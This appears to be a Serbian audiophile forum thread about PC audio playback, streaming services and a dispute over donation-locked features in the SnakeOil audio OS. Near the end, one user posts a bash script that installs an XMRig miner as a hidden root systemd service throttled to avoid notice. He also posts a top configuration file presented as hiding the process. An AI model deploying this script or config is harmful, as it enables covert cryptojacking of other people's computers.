Jump to content

PC kao izvor zvuka - tema MK II


dj.nik

Preporučeni Komentari

2 hours ago, Kuja said:

@Srecko ... A ako hoćete maksimalan kvalitet zvuka preko streaming-a, možda ne bi bilo loše da probate Qobuz?

Svi moji drugari koji su koristili i Tidal i Qobuz, su mi rekli da Qobuz primetno bolje svira i prešli su na njega.

Tidal nikada nisam probao a Qobuz slušam svakog dana i zadovoljan sam.

Nažalost ne mogu.

Moj sin je kupio (u Londonu živi) porodične licence za Tidal i Run (zbog mene pošto zna da ja volim HiFi a on i dalje strimuje Spotify na Devialet Phantom-e) i naravno mi ih dao i plaća ih samo zbog mene.

Run nisam ni probao iz principa j(objasnio sam mu jer on kupuje samo najskuplje što je na tržištu) jer smatram da je bezobrazno i neopravdano skup (mada ni meni a pogotovo njemu ti iznosi ne znače ništa). Jurio sam da osposobim Tidal ne da ga slušam već da ga imam da mogu da ga slušam i pričam da njim, jer ga nikada ne lažem.

Link to comment
Podeli na ovim sajtovima

pre 13 minuta, Kuja reče

Pa i ja sam donator. :)

Doduše uz zamenu za onaj RAM, ali ipak! :)

 

Ali nemaš onda ostale sa kojima pričaš na temi i sarađuješ.

Zato je glupo u bilo kom open source sistemu da postoji aktivacioni kod.

Onda nek naprave svoj OS potpuno. Nije fer da Ubuntu zajednica ne dobija procenat.  

Drugi su orali i kopali i pravili sistem i kernel - a neki Pera se setio da stavi aktivacioni kod na tvikove - koji su takođe drugi (o)smislili.:buehehe:

Treba i Žika da dobije procenat od te donacije :sarcastic_hand:

Link to comment
Podeli na ovim sajtovima

13 minutes ago, Mikorist said:

Onda nek naprave svoj OS potpuno. Nije fer da Ubuntu zajednica ne dobija procenat.

Onda bi i svi profesionalni sistem administratori koji održavaju drugima Ubuntu sisteme trebalo to da rade besplatno ili da uplaćuju procenat od zarade Ubuntu zajednici? :)

Čovek ne živi od ovoga, radi na SnakeOil-u u slobodno vreme, siću koju mu uplatimo koristi za održavanje sajta sa kojeg pruža podršku korisnicima.

Meni je to sasvim ok.

Evo i Volumio se plaća, a tu su i Audiolinux http://www.audio-linux.com/  i Euphony koji debelo košta https://euphony-audio.com/v4/subscription/

 

Izmenjeno od Kuja
Link to comment
Podeli na ovim sajtovima

15 hours ago, Srecko said:

"MPD 0.21.8 pa nadalje podržava Tidal preko dodatka. Konfiguracija je za sada dostupna samo u aktiviranim izdanjima. Dostupan od Blind Testing U5" kaže autor SnakeOil.

Znaci sve je lako rešivo 😁.

PS: Najbolji NUC u Akasa kucistu ima g. @Delija, ako ne grešim.

Sad vise i nije "najbolji", jer je i7 starije 10. generacije, ali kao media server sa 8 Tb SSD-om pasivno hladjen radi sjajno.

Izmenjeno od Delija
Link to comment
Podeli na ovim sajtovima

pre 13 minuta, Kuja reče

Onda bi i svi profesionalni sistem administratori koji održavaju drugima Ubuntu sisteme trebalo to da rade besplatno ili da uplaćuju procenat od zarade Ubuntu zajednici? :)

Čovek ne živi od ovoga, radi na SnakeOil-u u slobodno vreme, siću koju mu uplatimo koristi za održavanje sajta sa kojeg pruža podršku korisnicima.

Meni je to sasvim ok.

A bre ne me kapiraš ništa. Nije isto održavati sistem - što i napraviti distribucuju zasnovanu na GPL licenci.

Po kojoj su oni licenci -  free ili nije free?

Podrška se naplaćuje(donira) i održavanje ali ne i sistem... Donacija neka stoji pa ko uplati.

Ali da stoji aktivacioni kod u sistemu - odnosno nešto da ti ograničava sistem dok ne doniraš to je pederluk.

Klasični bre prevaranti.

Link to comment
Podeli na ovim sajtovima

Ili ako su otvorenoga koda - neka prikažu u kodu gde je aktivacija/ograničenje da možeš sam da  skineš i bez donacije.

Ovako ispada da imaš skrivalicu u kodu - malware.

Nemojte da se čudite ako krenu da Vam hakuju mejlove - podatke - kreditne kartice. Svaki SnakeOil se plaća na kraju. 

Link to comment
Podeli na ovim sajtovima

9 minutes ago, Mikorist said:

što i napraviti distribucuju zasnovanu na GPL licenci.

Ako sam dobro razumeo SnakeOil nije distribucija u smislu prepakovanog OS-a pod tuđim imenom.

Instalira se regularni Ubuntu, a SnakeOil mu dođe kao dodatni interfejs preko koga neznalice kao ja mogu da konfigurišu opcije.

Meni to dođe kao podrška. :)

Eto, priznajem, glup sam i ne kapiram, zli autor me iskoristio, idemo dalje! :D

 

Link to comment
Podeli na ovim sajtovima

9 hours ago, Mikorist said:

A ono što @zika kaže za podešavanja i sve.....Zaista jeste tako. Ovo sve svako radi na svoj rizik i na svoju sopstvenu računicu.

Neka podešavanja (ili više njih izvan normalnog režima rada) mogu da ubiju procesor - čak sam ubio jedan Ryzen - pregrejavanjem. Zato ja držim hladnjak od 20cm u kućištu. Zato imam overkil konfiguraciju.

Ako preteram negde od default podešavanja neće da bude problem. 

 

Ryzen si ubio sa XMR sigurno, tesko je drugcije...

Link to comment
Podeli na ovim sajtovima

pre 5 minuta, grone reče

Ryzen si ubio sa XMR sigurno, tesko je drugcije...

Sa Xmrig preciznije...

..
GITHUB.COM

RandomX, KawPow, CryptoNight and GhostRider unified CPU/GPU miner and RandomX benchmark - GitHub - xmrig/xmrig: RandomX, KawPow, CryptoNight and GhostRider unified CPU/GPU miner and RandomX benchmark

Ali jasm to svesno sam instalirao i ganjao na maksimumu.

Ali zamisli da skineš neku aplikaciju koja ti sama instalira Xmrig i da ne znaš da imaš na mašini.

Podese tako da je malo opterećenje. Čak se i muzika čuje predivno. :buehehe:

Link to comment
Podeli na ovim sajtovima

Što se tiče tzv. donacije, meni se to ne sviđa koliko god da je simbolična, možda i grešim ali tako mislim.

Nisam znao da postoje bilo kakva ograničenja SnakeOil OS bez donacije (verovatno piše u dokumentaciji ali je ona toliko obimna da je nisam čitao koncentrisano i to mi je promaklo) inače ne bih izgubio toliko vremena sa time i još bih bio na Win.

MNOGO VIŠE VOLIM DA KUPIM KOMPLETAN PROIZVOD KOJE GOD DA JE CENE.

Ovako sam u sopstvenim očima ispao majmun.

Tako ja gledam na to koliko god da mi se SnakeOil dopada.

Jednostavno je trebalo da istakne cenu (značajno veću) pa ko hoće da kupi ....

Naravno nije ni on lud jer bi se, siguran sam, našao neki razlog (povreda nečije intelektualne svojine npr.) da ga neko tuži.

 

Link to comment
Podeli na ovim sajtovima

4 minutes ago, Mikorist said:

Ali zamisli da skineš neku aplikaciju koja ti sama instalira Xmrig i da ne znaš da imaš na mašini.

Podese tako da je malo opterećenje. Čak se i muzika čuje predivno. 

Savim moguće, nadam sa da to ovde nije slučaj! :)

Evo Snake sviri iz RAM-a, a ovo je zauzeće sistemskih resursa:

ScreenShot2023-02-13at10_14_51PM.thumb.jpg.304e762fac5eaf8def311469d44c9331.jpg

...A ovo je ono što je aktivno na mašini:

ScreenShot2023-02-13at10_18_40PM.thumb.jpg.f3f51722c5d1d53a653428177e1d01ba.jpg

Link to comment
Podeli na ovim sajtovima

Skinuo čoveku Xmrig parazit sa mašine. Kao root se nakači...Podiže se sa sve sustavom...Čak je i top komanda promenjena da ne možeš da nađeš u sistemu gde je.  CPUQuota=30% - nema teorije da primetiš promenu - deo bash skripte koja to radi 

cat >/tmp/xmrig.service <<EOL
[Unit]
Description=xmrig
After=network-online.target
Requires=network-online.target

[Service]
User=root
Group=root

StandardOutput=journal
StandardError=journal

ExecStart=/usr/local/bin/xmrig
CPUQuota=30%
Nice=5
CPUWeight=1
Restart=on-failure
RestartSec=20s
StartLimitInterval=30min
StartLimitBurst=30

[Install]
WantedBy=multi-user.target
EOL
sudo mv /tmp/xmrig.service /etc/systemd/system/xmrig.service
sysctl -w vm.nr_hugepages=$(nproc)
for i in $(find /sys/devices/system/node/node* -maxdepth 0 -type d);
do
echo 3 > "$i/hugepages/hugepages-1048576kB/nr_hugepages";
done
sudo systemctl daemon-reload
sudo systemctl enable xmrig.service
sudo systemctl start xmrig.service
sudo mv xmrig /usr/local/bin/xmrig
sudo service xmrig start

 

Link to comment
Podeli na ovim sajtovima

19 minutes ago, Srecko said:

MNOGO VIŠE VOLIM DA KUPIM KOMPLETAN PROIZVOD KOJE GOD DA JE CENE.

.....

Naravno nije ni on lud jer bi se, siguran sam, našao neki razlog (povreda nečije intelektualne svojine npr.) da ga neko tuži.

 

Evo ima i da se kupi audiofilski Linux ko hoće skuplje :) :

1 hour ago, Kuja said:

... Volumio, Audiolinux http://www.audio-linux.com/  i Euphony koji debelo košta https://euphony-audio.com/v4/subscription/

 

Ja to gledam ovako:

Linux stručnjak vam dođe na kuću, ispodešava sistem i tu uslugu naplati.

SnakeOil aplikacija meni dođe kao taj isti stručnjak, sa tom razlikom da je veći deo usluge besplatan, a onaj manji, za koji ga častimo koliko ko može, mu ide za benzin. Baš da i to ne plaća iz svog džepa.

Ali to sam samo ja, naivan, koji u ljudima vidi najbolje. :)

Izmenjeno od Kuja
Link to comment
Podeli na ovim sajtovima

3 minutes ago, Kuja said:

 

Evo ima i da se kupi audiofilski Linux ko hoće skuplje :) :

 

Ja to gledam ovako:

Linux stručnjak vam dođe na kuću, ispodešava sistem i tu uslugu naplati.

SnakeOil aplikacija meni dođe kao taj isti stručnjak, sa tom razlikom da je veći deo usluge besplatan, a onaj manji, za koji ga častimo koliko ko može, mu ide za benzin. Baš da i to ne plaća iz svog džepa.

Ali to sam samo ja, naivan, koji u ljudima vidi najbolje. :)

Nisam ja neki čistunac.

Mrzim banke zbog sitnih slova koja ne mogu da pročitam (ne nosim bifokalne naočare nažalost) a ovo sam se osetio baš bez veze.

Svi to zovu donacijom da se nešto ne bi zeznuli pa da ih neko tuži a zbog "donacija" ne može 

Inače, što se mene tiče verovatno ću u dogledno vreme kupiti Apple mini M2, najjeftiniji, jer sam zezajuci se sa SnakeOil čitao neku diskusiju na Reditu gde ljudi koji su probali svašta kažu da Apple to radi i dalje najbolje jer im player-i (napricasmo se o njima) nisu priča za sebe već delovi sistema uklopljeni i prilagođeni.

Link to comment
Podeli na ovim sajtovima

pre 39 minuta, Kuja reče

..A ovo je ono što je aktivno na mašini:

ScreenShot2023-02-13at10_18_40PM.thumb.jpg.f3f51722c5d1d53a653428177e1d01ba.jpg

stavi u home ili u root (ili u oba) .topcr -sledeće

top's Config File (Linux processes with windows)
Id:i, Mode_altscr=0, Mode_irixps=1, Delay_time=3.0, Curwin=0
Def	fieldscur=¥š³Ž»œÀÄ·º¹Å&')*+,-./012568<>?ABCFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
	winflags=165812, sortindx=44, maxtasks=0, graph_cpus=0, graph_mems=0
	summclr=1, msgsclr=1, headclr=3, taskclr=1
Job	fieldscur=¥Š¹·º(³ŽÄ»œ@<§Å)*+,-./012568>?ABCFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
	winflags=193844, sortindx=0, maxtasks=0, graph_cpus=0, graph_mems=0
	summclr=6, msgsclr=6, headclr=7, taskclr=6
Mem	fieldscur=¥º»<œŸ¿ÀÁMBNÃD34·Å&'()*+,-./0125689FGHIJKLOPQRSTUVWXYZ[\]^_`abcdefghij
	winflags=193844, sortindx=44, maxtasks=0, graph_cpus=0, graph_mems=0
	summclr=5, msgsclr=5, headclr=4, taskclr=5
Usr	fieldscur=¥Š§šª°¹·ºÄÅ)+,-./1234568;<=>?@ABCFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
	winflags=193844, sortindx=3, maxtasks=0, graph_cpus=0, graph_mems=0
	summclr=3, msgsclr=3, headclr=2, taskclr=3
Fixed_widest=0, Summ_mscale=0, Task_mscale=0, Zero_suppress=0

pa pokušaj da nađeš xmrig

:risitas:

 

Tek je provalio da nešto ne štima kad je pokrenuo zahtevniju igricu :buehehe:

Link to comment
Podeli na ovim sajtovima

Kreiraj nalog ili se prijavi da daš komentar

Potrebno je da budeš član DiyAudio.rs-a da bi ostavio komentar

Kreiraj nalog

Prijavite se za novi nalog na DiyAudio.rs zajednici. Jednostavno je!

Registruj novi nalog

Prijavi se

Već imaš nalog? Prijavi se ovde

Prijavi se odmah
  • Članovi koji sada čitaju   0 članova

    • Nema registrovanih članova koji gledaju ovu stranicu
×
×
  • Kreiraj novo...